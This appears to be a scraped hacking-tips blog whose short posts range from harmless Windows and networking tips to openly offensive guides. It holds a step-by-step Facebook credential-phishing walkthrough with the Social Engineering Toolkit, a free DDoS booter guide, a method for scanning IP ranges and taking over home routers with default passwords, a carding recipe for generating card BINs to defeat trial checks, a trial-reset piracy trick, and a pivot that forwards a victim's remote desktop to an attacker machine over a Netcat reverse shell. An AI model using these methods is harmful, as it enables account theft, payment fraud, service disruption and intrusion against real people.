Uncategorized

HOW TO INSTALL ANY APP THAT IS NOT AVAILABLE IN YOUR COUNTRY

HOW TO INSTALL ANY APP THAT IS NOT AVAILABLE IN YOUR COUNTRY
1. Install an app that isn\’t available in your country
If you\’re really keen to get an app that\’s not available in your country then you can still get your hands on it by using a VPN. \’VPN\’ means \’virtual private network\’. It gives you a secure internet connection via private networks in locations outside of your current one.
Basically, a VPN service can make it look like you\’re accessing the internet from a different location. It\’s important that you choose a credible VPN. We regularly feature VPN deals in our AndroidPIT Store if you\’re looking for a good one at a low price.
Once you\’ve downloaded a VPN, select the country whose Play Store you want to access in the VPN app, get the VPN up and running, then open the Play Store app. It should land on the Play Store ghomepage of the country you selected. Now you can get the app you desire.
Uncategorized

SSH (Secure Shell)

SSH (Secure Shell)
SSH is a protocol similar to telnet which also facilitates connection to remote hosts for communication. However, SSH has an upper hand over telnet in terms of security. Telnet was primarily designed to operate within the local network and hence does not take care of security. On the other hand SSH manages to offer total security while connecting to remote hosts on a remote network or Internet.
Akin to telnet SSH also uses a client software and requires a username and Password to establish connection with the remote host.
Uncategorized

How to stress/boot/DDoS for free in 2020! [UNLIMITED ATTACKS

 How to stress/boot/DDoS for free in 2020! [UNLIMITED ATTACKS
This is a very quick and simple tutorial on how to stress/boot/DDoS for free in 2020 without using your own connection! No rocket science really and I don\’t encourage anyone to use it against other people since it\’s just very annoying, but it can be used for stress-testing your own server for example! 
Educational Purpose STRICTLY 
Go and register : 
Go to booter panel by clicking on circular icon 
Once you\’re there all you have to do is fill in the IP and method you want, and the time in seconds, max time you can use on the free plan is 5 minutes (so 300 seconds)
Uncategorized

How To Hack Facebook Account Using Kali Linux (For Educational Purposes Only)

Hello, everyone ,
Today i am going to show you one method to hack Facebook account for you , using Kali-Linux.
It is like phishing method but don\’t worry , you don\’t need to do all that heavy steps again,it is very simple all the stuffs(steps) is done by Kali Linux ….
NOTE- THIS IS FOR EDUCATIONAL PURPOSE ONLY, PLEASE DON\’T DO ANYTHING ILLEGAL.
Requirements:
1- Laptop or Computer.
2- Net connection with speed.
3- Kali Linux installed system or bootable pendrive with kali linux .
Process:
1) Open terminal using \” CTRL + ALT + T \”
2) type \” sudo root \” command (if you are not a root user)
3) enter your password
4) do all three steps if you are
not a root user.
Now,main steps 
5) go to \” Application \” on the top left hand side
6) then go to \” kali linux \”
7) then go to \” Exploitation tools\”
8) then go to \” social engineering toolkit \”
9) then go to \” setoolkit \”
Now it will show you some options –
10) press \” 1 \” for Social Engineering Attacks
11) press \” 2 \” for Website Attect Vector
12) press \” 3 \” for Credential Harvesting Attect method
13) press \” 2 \” for Site Cloner
14) now it will ask you \” Harvester/Tabnabbing \” 
15) now, open new terminal by pressing \” CTRL + ALT + T \”
16) type \” ifconfig \” it will help you to show your ip address
17) copy your ip address and paste after Harvester/Tabnabbing : XXX.XX.XX.XXX
18) then it will ask a website name- enter – \” http://www.facebook.com \”.
*19) now the most important step
        now change your XXXXXXXXXX (number or ip-address) to link like http://www.facebook.com/pages/for/hack……etc.
by using services like ADF.LY , Goo.gl, Binbox, etc.
20) now , you send that ip address to the victim/tragets by email /WhatsApp / mail.
21)when every victim/targeted user click on your link & enter id & passwords….it will save in your system in  
Home–> Root–> var –> www–> xyz.txt
Uncategorized

How To Combine Two Wifi Connections To Get A Faster Internet

How To Combine Two Wifi Connections To Get A Faster Internet
You have more than one active internet connections and you are using only one at a time, while the other is resting? Don\’t let it be lazy. Combine them all to get combined internet speed. Say you have two connections of 1 Mbps each, you just can make 1+1=2. This can work regardless of the type of the connections, i.e. it may be wired, wireless or mobile communication.
Method 1 of 4: Combining LANs
Steps:
1. Turn everything on your computer, modems (in case of DSL).
2. Connect them on the relative ports.
3. Establish Connections. Dial or do whatever you need to do to establish an Internet connection and test each one by one separately. If all good proceed to the next step.
4. While each one is active and connected, navigate to the \”Network Devices\” folder of your computer. It usually stays under control panel.
Windows 8 or Windows 8.1, press Windows D to navigate to the desktop, and the rest is the same as windows 7 below.
For Windows 7 and Vista, Click the network icon on the task bar-> then click \\ Open Network and Sharing Center\\ . Then click \\ Change Adapter settings\\
5. Review the Connections. Review the window showing all of your network connections.
6. Drag and select. Drag and select Active LAN (Wired, Wireless or DSL Modem) connections.
7. Right click on one of the selected-> click \”Bridge Connections.\” Then wait and a network bridge with different icon will appear. You might have to provide administrative right.
*Method 2 of 4: Load Balancing*
If you connect 2 internet connection to Windows at a time, the operating system automatically selects one connection as primary and uses others as as failover connection mode. You can force Windows 7, 8 to use both connections simultaneously using a simple trick.
Steps:
►Open Network and Sharing Center > Change Adapter Settings
►Go to properties of any of your active Internet connection whether it be LAN, WiFi or 3G/4G.
►Select Internet Protocol TCP/IP Version 4, Open its properties, then go to advanced.
►Uncheck the Automatic Metric and type “15”.
►Repeat same steps on other Internet connections you want to combine.
►Restart your Computer.
Method 3 of 4:Using Connectify Hotspot
Steps:
►Download the Connectify Dispatch
►Install the Dispatch software.
►Run. Then click \”Start Dispatch\”.
►Connect all your modems or network connections
Method 4 of 4: Using Speedify
Steps:
►Speedify is a new cloud service from the makers of Connectify, that lets you easily combine multiple WiFi, 3G/4G, and wired networks to create one faster and more reliable Internet connection.
►Visit [www.speedify.com] to begin your free, 3-day trial. Once your trial has started, you will receive an email with your login and a download link for the Speedify client software (for Mac OS X+ & PC)
►Install the Speedify software and then simply enter the email and password that you received from Speedify to log into the Speedify server netwok
►Click the \’Speed Me Up\’ button to log in. Speedify will automatically connect you to the nearest and fastest Speed Server to ensure that you get the maximum speed and reliability of your Internet connections combined.
►Now, just ensure that you have two or more WiFi, mobile broadband, or wired Internet connections active on y our computer, and Speedify does the rest:
►Connect all your modems or network connections.
Uncategorized

How To Hack or Reset Trial Period of Any Software and Use Them Lifetime in PC

How To Hack or Reset Trial Period of Any Software and Use Them Lifetime in PC 
Follow the steps for running this Software in your Computer.
#Hacks
①. Download “Runasdate” Software
②. Install Runasdate Software in your Computer PC.
③. Now run any trial software on your @devilbadhacker computer and write down the date of installation on your PC.
④. When your trial version gets over. Just Right Click on your software and select Runasdate.
Now Runasdate software extend the trial period of your software by increasing trial period. With the help of this software, you can use any software on your PC for a lifetime, without spending money
Uncategorized

Laptops & Computers Shortkey

Laptops & Computers Shortkeys

Ctrl+A – Select All
Ctrl+B – Bold
Ctrl+C – Copy 
Ctrl+D – Fill Down
Ctrl+F – Find
Ctrl+G – Goto
Ctrl+H – Replace
Ctrl+I – Italic
Ctrl+K – Insert Hyperlink
Ctrl+N – New Workbook
Ctrl+O – Open
Ctrl+P – Print
Ctrl+R – Fill Right
Ctrl+S – Save
Ctrl+U – Underline
Ctrl+V – Paste
Ctrl W – Close
Ctrl+X – Cut
Ctrl+Y – Repeat
Ctrl+Z – Undo
F1 – Help
F2 – Edit
F3 – Paste Name
F4 – Repeat last action
F4 – While typing a formula, switch between absolute/relative refs
F5 – Goto
F6 – Next Pane
F7 – Spell check
F8 – Extend mode
F9 – Recalculate all workbooks
F10 – Activate Menu bar
F11 – New Chart
F12 – Save As
Ctrl+: – Insert Current Time
Ctrl+; – Insert Current Date
Ctrl+\” – Copy Value from Cell Above
Ctrl+’ – Copy Formula from Cell Above
Shift – Hold down shift for additional functions in Excel’s menu
Shift+F1 – What’s This?
Shift+F2 – Edit cell comment
Shift+F3 – Paste function into formula
Shift+F4 – Find Next
Shift+F5 – Find
Shift+F6 – Previous Pane
Shift+F8 – Add to selection
Shift+F9 – Calculate active worksheet
Shift+F10 – Display shortcut menu
Shift+F11 – New worksheet
Ctrl+F3 – Define name
Ctrl+F4 – Close
Ctrl+F5 – XL, Restore window size
Ctrl+F6 – Next workbook window
Shift+Ctrl+F6 – Previous workbook window
Ctrl+F7 – Move window
Ctrl+F8 – Resize window
Ctrl+F9 – Minimize workbook
Ctrl+F10 – Maximize or restore window
Ctrl+F11 – Inset 4.0 Macro sheet
Ctrl+F1 – File Open
Alt+F1 – Insert Chart
Alt+F2 – Save As
Alt+F4 – Exit
Alt+Down arrow – Display AutoComplete list
Alt+’ – Format Style dialog box
Ctrl+Shift+~ – General format
Ctrl+Shift+! – Comma format
Ctrl+Shift+@ – Time format
Ctrl+Shift+# – Date format
Ctrl+Shift+$ – Currency format
Ctrl+Shift+% – Percent format
Ctrl+Shift+^ – Exponential format
Ctrl+Shift+& – Place outline border around selected cells
Ctrl+Shift+_ – Remove outline border
Ctrl+Shift+* – Select current region
Ctrl++ – Insert
Ctrl+- – Delete
Ctrl+1 – Format cells dialog box
Ctrl+2 – Bold
Ctrl+3 – Italic
Ctrl+4 – Underline
Ctrl+5 – Strikethrough
Ctrl+6 – Show/Hide objects
Ctrl+7 – Show/Hide Standard toolbar
Ctrl+8 – Toggle Outline symbols
Ctrl+9 – Hide rows
Ctrl+0 – Hide columns
Ctrl+Shift+( – Unhide rows
Ctrl+Shift+) – Unhide columns
Alt or F10 – Activate the menu
Ctrl+Tab – In toolbar: next toolbar
Shift+Ctrl+Tab – In toolbar: previous toolbar
Ctrl+Tab – In a workbook: activate next workbook 
Shift+Ctrl+Tab – In a workbook: activate previous workbook
Tab – Next tool
Shift+Tab – Previous tool
Enter – Do the command
Shift+Ctrl+F – Font Drop down List
Shift+Ctrl+F+F – Font tab of Format Cell Dialog box
Shift+Ctrl+P – Point size Drop down List
Ctrl + E – Align center
Ctrl + J – justify
Ctrl + L – align  
Ctrl + R – align right
Alt + Tab – switch applications
Windows + P – Project screen
Windows + E – open file explorer
Windows + D – go to desktop
Windows + M – minimize all window s
Windows + S – search
Uncategorized

How To Configure Port Forwarding to Create Internet-Connected Services

How To Configure Port Forwarding to Create Internet-Connected Services 
#hackingtutorials
Ports allow network and internet-connected devices to interact using specified channels. 
While servers with dedicated IP addresses can connect directly to the internet and make ports publicly available, a system behind a router on a local network may not be open to the rest of the web. 
To overcome this, port forwarding can be used to make these devices publicly accessible.
Networked services and apps running on various devices make use of ports at specific numbers as a means to initiate connections and establish communications. 
Different ports can be used simultaneously to easily separate and parse different types of traffic or requests. 
Ports are generally associated with specific services, such that a client can connect to a server on a specific port and assume that the server will accept a connection at that port and respond appropriately.
Some commonly used ports are shown below.
21: FTP (File Transfer Protocol)
22: SSH (Secure Shell)
23: Telnet (Teletype Network)
25: SMTP (Simple Mail Transfer Protocol)
80 : HTTP (Hypertext Transfer Protocol)
194: IRC (Internet Relay Chat)
443: HTTPS (HTTP Secure)
While ports make it simple to identify and address specific requests, port-numbering conventions are a standard, not a rule. 
Ports can be used for whatever a person may choose to host on them, so long as the connection between the client and server on a given port uses a consistent protocol.
In web browsers, non-standard HTTP ports can be specified following a colon at the end of an IP address or URL in order to attempt to load HTTP content over that port.
 If a web server is running on a local machine on port 8080 rather than the conventional port 80, it would be possible to access this in a web browser by navigating to localhost:8080 or 127.0.0.1:8080, but if either of the two aforementioned addresses were entered without the \”:8080\” suffix, the same page would not load.
While any open port should allow connection attempts, in order for these attempts to be made, a client device needs network access to the device. 
While this isn\’t necessarily an issue for a server connected to the internet directly or a connection across a local area network, it becomes problematic when one attempts to access a specific port on a device which is protected by a router or firewall.
Most home or office networks are connected to the internet through a router. 
A router is able to manage internet usage for a network and centralize the traffic at one IP address. 
All requests and packets are sent through the router before being distributed back to the respective devices which made the original requests. 
By default, routers do not handle incoming requests on specific ports. If one attempts to connect over SSH to a router, the router has no way to handle that request, nor does it know who on the network to forward the requests to. 
This problem can be solved by configuring port forwarding within the router.
 Step 1 

Identifying Your Router & Control Panel 
Routers generally provide an HTTP administration panel on port 80. 
This control center can be accessed by using the local network IP of the router, 192.168.0.1 or 192.168.1.1, in most cases. 
On Microsoft Windows, one can identify the location of the connected router or \”Default Gateway\” by opening a Command Prompt window and running the command below.
Command :-
ipconfig/all
​On Linux and macOS, the same can be accomplished using netstat. 
Open a new terminal window and run the following command to see the IP of the router you\’re connected to.
Command :- 
netstat -rn
Step 2 

 Accessing the Router 
 Configuration Panel
Once you\’ve identified the local IP address of your router, you can access the configuration panel by opening the address in your web browser, just as you would any other URL. 
(Note: some routers, such as Amplifi, actually have mobile apps that make this easier.)
​Once the router management page is open, log in to the router. 
The username and password may have been set by yourself (if you know what\’s good for you), an internet service provider, or be the router manufacturer\’s default credentials. 
This information can generally found online in the router\’s documentation, and sometimes even physically on the side of the router.
While all routers will have slightly different interfaces, once logged in, look for an \”Advanced\” area, or something which includes \”Port Forwarding.\” 
In the case below, the relevant area was titled \”Advanced Port Forwarding Rules.\”
 Step 3 

 Defining Port Forwarding Rules 
To demonstrate usage of port forwarding rules, we\’ll use a sample use case. 
In this scenario, a user has a Raspberry Pi connected to their home network router. 
The Pi has an SSH service running, allowing a user to log in if they have the correct username and password. 
The current IP address of the Pi is 192.168.0.105.
The user names the rule \”RBPi SSH\” to make it easier to identify for future administration. 
The name of the rule does not matter beyond personal preference, as it does not affect how the port is used.
The Public Port (sometimes called Source Port) range is set to 22 through 22, or the standard SSH port 22. 
This is the port which the router will reveal to the internet as being open, and the port which a user will connect to if they wish to connect to the Pi.
The Private Port (sometimes Destination Port) is set to 22 as well, as the SSH daemon is running on port 22 on the Pi.
The Traffic Type is set to TCP, as SSH is TCP traffic.
The IP Address is set to that of the Pi on the local network, 192.168.0.105.
Finally, the checkbox at the left of the rule is checked in order to enable the new setting.
While your router\’s interface may work slightly different, the concept is the same
This rule, when saved, means that now a user can connect to SSH to the IP address of the router from anywhere on the internet and be forwarded to their Raspberry Pi server. 
This could also be used to create an HTTP web server on port 80 or perhaps facilitate a video game server on a specific port. 
Keep in mind that some ISPs have defined rules regarding hosting servers and other content, and be sure to check any applicable rules before choosing to host an internet-accessible server on a local network.
One vulnerability that arises when exposing ports to the internet through port forwarding is port scanning. 
Attackers on the internet use automated drones to scan sets of IP addresses or use tools like Shodan to find potentially vulnerable devices with certain ports active. 
SSH ports are a prime target, as they represent a shell environment where data could be stolen and malware could potentially be installed
​In the case of port forwarding, to protect against port scanning, it may be advantageous to change the public or source port in the router configuration. 
Rather than using a common port like 22 which is frequently scanned for, a more uncommon port such as 9022 can serve just as well to connect over SSH to the Raspberry Pi without leaving a low-numbered port available to be discovered through scanning.
With this port changed, the only difference in usage is that a client connecting to the devices over SSH from outside the network will need to specify port 9022 rather than assuming the default port, 22, is in use.
 Attempting to connect to port 22 will not work outside of the local network, as while the SSH daemon on the Pi is running on that port, it is being forwarded over port 9022, not port 22.
While router-based port forwarding is useful for internet-facing network configuration, port forwarding can also be established at the system level when using Linux.
 Stepp 4 

 System Level Port Forwarding on Linux 
 
Much in the same way that a router port can be linked to a specific port on a device within a network, one port can also be linked to another to facilitate easier use. 
For instance, when installing the Cowrie honeypot, the SSH daemon is moved from port 22 to port 9022, and then port 2222 where the honeypot is running is forwarded to port 22 where it will be scanned and attacked on the internet.
To begin configuring local port forwarding on Linux, one may first need to enable it within Linux itself. 
To do this, run the command below to set the value of ip_forward to 1 or true.
Command :- 
echo \”1\” > /proc/sys/net/ipv4/ip_forward

​Once IP forwarding is enabled, ensure that you know the current port of the service you intend to forward. 

During the configuration of the Cowrie honeypot, this is done by changing the SSH daemon configuration to move the service to port 9022.
​Finally, to enable local port forwarding, iptables can be used. 
The command below redirects requests on port 22 to port 2222, where they are handled by the honeypot.
Command :- 
iptables -t nat -A PREROUTING -p tcp –dport 22 -j REDIRECT –to-port 2222

 Other Uses for Port Forwarding 

Port forwarding can be applied to other implementations, such as forwarding port 8080 to port 80 to make a test server more easily accessible or to simply add additional ports to use for a certain service. 
Port forwarding is a very valuable technique for remote access, server administration, network configuration, and even for post-exploitation and pivoting. 
Understanding it can be the key to countless other security projects!
Uncategorized

How To Use Remote Port Forwarding to Slip Past Firewall Restrictions Unnoticed

How To Use Remote Port Forwarding to Slip Past Firewall Restrictions Unnoticed 
Local port forwarding is good when you want to use SSH to pivot into a non-routable network. 
But if you want to access services on a network when you can\’t configure port-forwarding on a router and don\’t have VPN access to the network, remote port forwarding is the way to go.
Remote port forwarding excels in situations where you want access to a service on an internal network and have gained control of a machine on that network via a reverse shell of some kind. 
Whether you\’re a pentester or system admin, this is a good thing to know about.
For example, let\’s say you compromise a public terminal in the local library and get some credentials. 
You install a persistent reverse shell of some sort, which communicates back to your machine, but you don\’t have access to other services on the machine. 
The victim machine might have an SQL instance configured on localhost only that you want access to, or maybe you want to access the remote desktop. 
Maybe the network is hosting some sort of admin panel you\’d like to poke around in. Whatever it is you want, a compromised host and SSH will get you in.
Remote port forwarding isn\’t only for malicious scenarios. 
You can use it to punch a temporary hole out of a network to use work services at home, though that may be frowned upon by your security team.
Another excellent usage is in phishing campaigns where a user has executed your payload, and you only have a reverse shell connection back. 
After a bit of information gathering, then privilege escalation, you gather the credentials for the administrative user and wish to use those on another service on the compromised machine.
In this article, we\’ll be using SSH to access the remote desktop on a host located behind a firewall in an internal network — all without modifying the port forwarding rules on the gateway!
The Situation 
The shell is a Netcat connection running cmd.exe. 
The user \”bob\” is not a privileged user. 
Through prior information gathering, I know that the user \”barrow\” is a privileged user, and I also know that this machine has a remote desktop connection available.
It would be excellent to log into this machine via a remote desktop as an administrative user, but it is non-routable to my machine. 
Our compromised machine is behind a router, with an internal IP address, and I don\’t have access to the internal network, except via the internal host.
I can use the reverse shell to interact with the compromised host, but if I attempt to connect to a remote desktop, the IP address will be invalid. 
If I use the public-facing IP address, I will be connecting to a router which will just drop my packets. 
Since I don\’t have an SSH server on this network that I can pivot with, I\’ll have to use Plink to forward the remote desktop service to my attacking machine.
Step 1 

 Install Plink 
Plink is a Windows command line SSH client. 
It is included with Kali Linux in the /usr/share/windows-binaries/ directory. 
It can also be downloaded from the developer (look for the plink.exe file).
Link :-
Step 2 

Configure Remote Port Forwarding 
Using my Netcat shell and plink.exe, I set up a remote port forward to my attacking machine from my victim machine by typing the following into the reverse shell I have established from my victim machine.
plink attackingMachine -R 4000:127.0.0.1:3389
The syntax is similar to SSH. Using the -R option tells Plink to connect to the attacking machine and bind a channel on port 4000 (I arbitrarily selected port 4000 — you can select any port). 
The next portion in between the colons defines what service will be served to port 4000 on the attacking machine. 
In this case, the victim machine\’s port 3389. Once this command is entered, I will log in with my credentials to my attacking machine. 
Now, my attacking machine has access to the remote desktop service on the victim machine on my localhost port 4000.
If you\’re paying attention, you may have noticed that I used the localhost address on the victim machine. 
This can be useful for port forwarding services that are generally constrained to localhost access only, such as mySQL.
Step 3 

Log into a Remote Desktop 
With this running on my Netcat shell, I connect to my victim machine\’s remote desktop service using the rdesktop command. 
The following command uses the remote desktop protocol to connect to localhost port 4000 where my victim machine is forwarding its local port 3389.
Command :- 
rdesktop localhost:4000
All that\’s left to do is use a known credential to log into Windows, either phished or gained via privilege escalation.
 From here, I have full administrative access to the system, despite the system\’s gateway dropping all inbound connection requests. 
I also retained my initial shell connection, which is always important to me. 
Shells can be a lot easier to lose than they are to get back.
SSH is an excellent tool for pivoting in networks, but it\’s not limited to penetration testing. 
Remote port forwarding can provide you access to services on a machine that would normally be inaccessible. 
This can be useful if you want to share your services with networks that normally would not be able to reach them. 
For example, if you need to temporarily connect to a service at work from your home but the firewall is dropping all inbound packets. 
In some cases, setting up a reverse SSH tunnel is easier than port forwarding a consumer-grade router.
Uncategorized

How to Hack the Home Routers and gain the Admin Rights

How to Hack the Home Routers and gain the Admin Rights…
Requirements:
Port Scanner (zenmap,superscan or unicornscan.I use Zenmap)
Web Browser (Chrome,Firfox or Safari)
Internet Connection(Any kind of Internet connection)
First of all I want to tell you why I use Zenmap because Nmap is the best friend of hackers and Zenmap is the graphical user interface of nmap.
Instruction on How to Hack the Home Routers and gain the Admin Rights…
1. We should select an IP range. I have selected IP range that includes my public IP address.
XXX.XXX.30.0-XXX.XXX.30.255
2. Now let’s scan for home routers.
When you finished your scan, You can find IP addresses which has open ports such as http port(80), ftp port(21) and telnet port(23).
I have found many IP addesses with port 80 is opened.
So I stopped my scan.
3. Now you can access these addesses using your web browser because http port is opened and we need to find whether the web page is router log in page.
4. If you see the alert error messages, it says TD-8817. So we can Google for it or you can visit routerpassword.com to know the default router username and password
5. Now let’s try to access these IP addresses using default logins we just got on step 4.
Default username and passwords are not same for every routers.
With username : admin and password : admin, we can log in to the router administration page
Hope you found it useful
Uncategorized

How to Make Working BIN for Premium Accounts?

How to Make Working BIN for Premium Accounts?
Before we start we should now one thing, there are two types of trial CC Verification in Premium Accounts trial. Let’s learn how to make bins
First one is, Validity Check Trial.
This type of trial just checks CC EXP CVV Validation and starts your trial
Very Very easy to bypass their verification
Eg. Tidal
Second one is, Authorization Hold trial.
This type of trial makes an authorixation hold on the card for 1 USD.
It also have verification system to verify card holder name if the card is VBV.
Eg. Netflix
For Finding a bin you need the following things Needed before starting Work
 Hardworking
Patience
 CC Generator
CC Checker
 Good Internet connection
VPN (Premium)
Now if you want to find a bin for the second type of Premium Accounts you should follow the following:-
Step 1: Goto Country/BANK to BIN webistes like
Step 2: Choose Any Country you want (Mainly Low secured countries like OMAN,UAE and etc)
Step 3: Choose Small Banks (They are less secured)
Step 4: Choose one BIN of Debit card (not credit)
Step 5: Generate CC with it
Step 6: Check with it
Step 7: Get lives one
Step 8: Test it
Step 9: Start from Step 2 again till you get working one
Attention: Don’t Share your hard work results with Peoples Or Else It Get Patched
For type 1 Trials:
Choose USA, CAPITAL ONE Mastercards.
1) Choose one BIN of Debit level card (not credit)
2) Generate CC with it
3)Check with it
4)Get lives one
5)Test it
Do Again and again till you get working one
Don’t forget to change your IP to the CC Countries IP
That’s it  then you get your own bin. Now you can easily get working bins or more like you can make working bins.
If you like our tutorial please share with your friends and support us. Stay updated for such awesome tips and tricks. Practice more and have patience to get working bins.
Uncategorized

TYPES OF PENETRATION TESTING

TYPES OF PENETRATION TESTING
Overt Penetration Testing: 
Using overt penetration testing, you work with the organization to identify  
potential security threats, and the organization’s IT or security team shows you  
the organization’s systems. The one main benefit of an overt test is that you  
have access to insider knowledge and can launch attacks without fear of  
being blocked. A potential downside to overt testing is that overt tests might  
not effectively test the client’s incident response program or identify how  
well the security program detects certain attacks. When time is limited and  
certain PTES steps such as intelligence gathering are out of scope, an overt  
test may be your best option. 
Covert Penetration Testing
Unlike overt testing, sanctioned covert penetration testing is designed to sim- 
ulate the actions of an attacker and is performed without the knowledge of  
most of the organization. Covert tests are performed to test the internal  
security team’s ability to detect and respond to an attack. 
Covert tests can be costly and time consuming, and they require more  
skill than overt tests. In the eyes of penetration testers in the security industry,  
the covert scenario is often preferred because it most closely simulates a true  
attack. Covert attacks rely on your ability to gain information by reconnais- 
sance. Therefore, as a covert tester, you will typically not attempt to find a  
large number of vulnerabilities in a target but will simply attempt to find the  
easiest way to gain access to a system, undetected.
Uncategorized

Here is a small list of some of the Frequently asked Questions about hacking:

Here is a small list of some of the Frequently asked Questions about hacking:
How long does it take to become a hacker?
Hacking is not something that can be mastered overnight.It really takes quite some time to understand and implement the skills that actually put you in the hacker’s shoes.
So, for anyone who is wanting to become a hacker, all it takes is some creativity,willingness to learn and perseverance.
What skills do I need to become a hacker?

In order to become a hacker, it is essential to have a basic understanding of how a computer system works.For example,you may start off with basics of operating system,computer networks and some programming.
Atthis point in time,you need not worry much about this question as this book will take you through all those necessary concepts to establish the skills that you need to possess as a hacker.
What is the best way to learn hacking?
Assaid earlier,the best way to learn hacking is to start off with the basics.Once you have established the basic skills,you can take it even further by going through the books that discuss individual topics in a much detailed fashion.Do not forget the power of Internet when it comes to acquiring and expanding your knowledge.
Uncategorized

How To Change Your IP In Less Than A Minute In PC

How To Change Your IP In Less Than A Minute In PC 

• Click on \”Start\” in the bottom left hand corner of screen
• Click on \”Run\”
• Type in \”command\” and hit ok
You should now be at an MSDOS prompt screen.
• Type \”ipconfig /release\” just like that, and hit \”enter\”
• Type \”exit\” and leave the prompt
• Right-click on \”Network Places\” or \”My Network Places\” on your desktop.
• Click on \”properties\” You should now be on a screen with something titled \”Local Area Connection\”, or something close to that, and, if you have a network hooked up, all of your other networks.
• Right click on \”Local Area Connection\” and click \”properties\”
• Double-click on the \”Internet Protocol (TCP/IP)\” from the list under the \”General\” tab
• Click on \”Use the following IP address\” under the \”General\” tab
• Create an IP address (It doesn\’t matter what it is. I just type 1 and 2 until i fill the area up).
• Press \”Tab\” and it should automatically fill in the \”Subnet Mask\” section with default numbers.
• Hit the \”Ok\” button here
• Hit the \”Ok\” button again You should now be back to the \”Local Area Connection\” screen.
• Right-click back on \”Local Area Connection\” and go to properties again.
• Go back to the \”TCP/IP\” settings
• This time, select \”Obtain an IP address automatically\” tongue.gif 
•18. Hit \”Ok\”
• Hit \”Ok\” again
• You now have a new IP address
With a little practice, you can easily get this process down to 15 seconds.
Uncategorized

How Trojans Impact Mobile Devices

How Trojans Impact Mobile Devices
━━━━━━━━━━━━━
Trojans aren’t problems for only laptop and desktop computers. They can also impact your mobile devices, including cell phones and tablets.
In general, a Trojan comes attached to what looks like a legitimate program. In reality, it is a fake version of the app, loaded up with malware. Cybercriminals will usually place them on unofficial and pirate app markets for unsuspecting users to download.
In addition, these apps can also steal information from your device, and generate revenue by sending premium SMS texts.
One form of Trojan malware has targeted Android devices specifically. Called Switcher Trojan, it infects users’ devices to attack the routers on their wireless networks. The result? Cybercriminals could redirect traffic on the Wi-Fi-connected devices and use it to commit various crimes.
━━━━━━━━━━━━━
Uncategorized

How to get a INVITE code from HTB(hack the box)?

How to get a INVITE code from HTB(hack the box)? 
▫️ Step 1
go to the inspect elements by pressing CTRL+SHIFT+I. you can see js/inviteapi.min.js parameter that seems interesting.
▫️ Step 2
go to the https://www.hackthebox.eu/js/inviteapi.min.js and look if there is anything to do with. you will see that there is makeInviteCode. we will use it in invite page console.
▫️ Step 3
go back to invite page and open inspect elements and go to the console and just write makeInviteCode there and hit ENTER. you will see some kinda encoded code.
▫️ Step 4
it is base64 encoded. go to https://www.base64decode.org/
and decode it easily. it will give you some parameter that will give you invite code.
▫️ Step 5
you can’t get anything by make get a request to https://www.hackthebox.eu/api/invite/generate. so we will make a post request using curl.
type this command in your terminal
curl -XPOST
And you will get the invite code. but remember, a particular invite-code will work only for a particular IP. so you won’t be able to use anyone’s code.
Uncategorized

What is cross-site scripting

What is cross-site scripting
Cross-site scripting is what happens when an attacker takes advantage of a vulnerability in a webpage to inject their own code. That code can steal user information such as credentials, session cookies, and other sensitive data, and can even live persistently on a site to attack multiple users.
A XSS attack is unique because these vulnerabilities don\’t target the website or web app they exploit–it\’s only an attack vector. XSS uses scripts that are executed on a user\’s machine; these scripts are called client-side scripts. The vast majority of these are coded in JavaScript or HTML, though there are other languages that can be used for client-side scripts.
Uncategorized

HOW TO SET A PASSWORD FOLDER

HOW TO SET A PASSWORD FOLDER
#Stark
1. Select the file or folder you want to encrypt.
2. Right-click the file or folder and select Properties.
3. On the General tab, click the Advanced button.
4. Check the box for the \”Encrypt contents to secure data\” option.
5. Click Apply and then OK.
Note: If the \”Encrypt contents to secure data\” option is not selectable and grayed out or you do not see the option at all, you likely have a Home edition of Windows, which does not support this feature. It is also possible that the hard drive where the files are located is not formatted as NTFS, as this is a requirement for the encryption feature.
Uncategorized

HOW TO USE PEN DRIVE AS RAM

HOW TO USE PEN DRIVE AS RAM :
1. First of all plug your USB in the USB port and make sure that you do not have any important data on USB.
2. Open your “My Computer” and Right click onto the USB. Which you want to use as RAM.
3. Select “Properties” (the last option) from the drop down menu.
4. A new window will open select “Ready Boost” Tab from there. And tick on the “Use this device” button.
5. Select the space which you want to use for RAM.
6. Finally click onto the “Apply” and then finally “OK” button.
7. That’s it you have successfully used your USB (Pen drive) as a virtual memory (RAM) for your computer.
Uncategorized

How to remove malware\’s using cmd

How to remove malware\’s using cmd
Step 1. Open Command Prompt from search and run as an administrator.
Step 2. Type D: and press Enter.
Step 3. Type attrib and press Enter. You\’ll see autorun.inf virus listed.
Step 4. To remove virus using CMD, type into your command prompt attrib -r -a -s -h *.* and press Enter. This will remove the Read Only, Archive, System and hidden file attribute from all the files. (*.* for all the files with all different types of file extensions).
Step 5. Type del autorun.inf and enter, to delete the files